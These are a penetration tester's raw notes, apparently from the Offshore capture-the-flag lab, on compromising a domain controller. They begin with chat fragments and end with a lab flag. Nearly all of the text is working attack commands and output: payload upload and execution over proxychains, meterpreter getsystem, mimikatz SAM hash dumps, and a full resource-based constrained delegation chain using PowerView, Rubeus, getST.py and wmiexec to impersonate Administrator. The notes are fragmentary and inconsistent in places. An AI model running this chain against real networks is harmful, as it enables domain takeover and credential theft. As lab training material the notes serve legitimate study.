-
joe’s password is empty
-
[3:19 PM]
and he has GenericWrite on dc02
-
[3:20 PM]
so from ws03 I need to exploit RBCD
-
[3:20 PM]
as joe
-
[3:20 PM]
to get into DC02```bash proxychains crackmapexec smb 172.16.2.102 -u ‘joe’ -p ” —put-file prompt.exe ‘prompt.exe’ 2>/dev/null
proxychains crackmapexec smb 172.16.2.102 -u ‘joe’ -p ” -x “.\prompt.exe” 2>/dev/null
## Meterpreter
```bash
meterpreter > getuid
Server username: DEV\joe
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Mimikatz
mimikatz # lsadump::sam
Domain : WS03
SysKey : 539b95e196e5cc40bcebed509c3ac4f1
Local SID : S-1-5-21-3524167559-3123258524-3282826305
SAMKey : 41a1a9fb42e4dbd1395db78db3945dfd
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003ea (1002)
User : justalocaladmin
Hash NTLM: 9d5c8041317bb80950b9431db921c08a
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# $targetComputer is DCname
# example change $targetComputer into dc.support.htb bc we are in managment.support.htb
Get-DomainComputer DC02.dev.admin.offshore.com | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
.\Rubeus.exe hash /password:Summer2018!
[*] Action: Calculate Password Hash(es)
[*] Input password : Summer2018!
[*] rc4_hmac : EF266C6B963C0BB683941032008AD47F
./Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:norma.branham /msdsspn:cifs/DC02.dev.admin.offshore.local /ptt
dir \\DC02.dev.admin.offshore.com\C$
Getting the Machine SPN ticket
┌──(jay㉿jsec)-[~/Documents/tools/impacket/examples]
└─$ proxychains -f /home/jay/Documents/offshore/DC02/proxychains4.conf python getST.py -spn "cifs/DC02.dev.admin.offshore.com" -impersonate Administrator -dc-ip 172.16.2.6 'dev.admin.offshore.com/attackersystem:Summer2018!'
[proxychains] config file found: /home/jay/Documents/offshore/DC02/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[*] Impersonating Administrator
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:5000 ... 172.16.2.6:88 ... OK
[*] Saving ticket in Administrator.ccache
Using the ticket to get the shell
┌──(jay㉿jsec)-[~/Documents/tools/impacket/examples]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(jay㉿jsec)-[~/Documents/tools/impacket/examples]
└─$ proxychains -f /home/jay/Documents/offshore/DC02/proxychains4.conf python wmiexec.py dev.admin.offshore.com/Administrator@DC02.dev.admin.offshore.com -no-pass -k
OFFSHORE{l@zy_adm1ns_ru1n_th3_p4rty}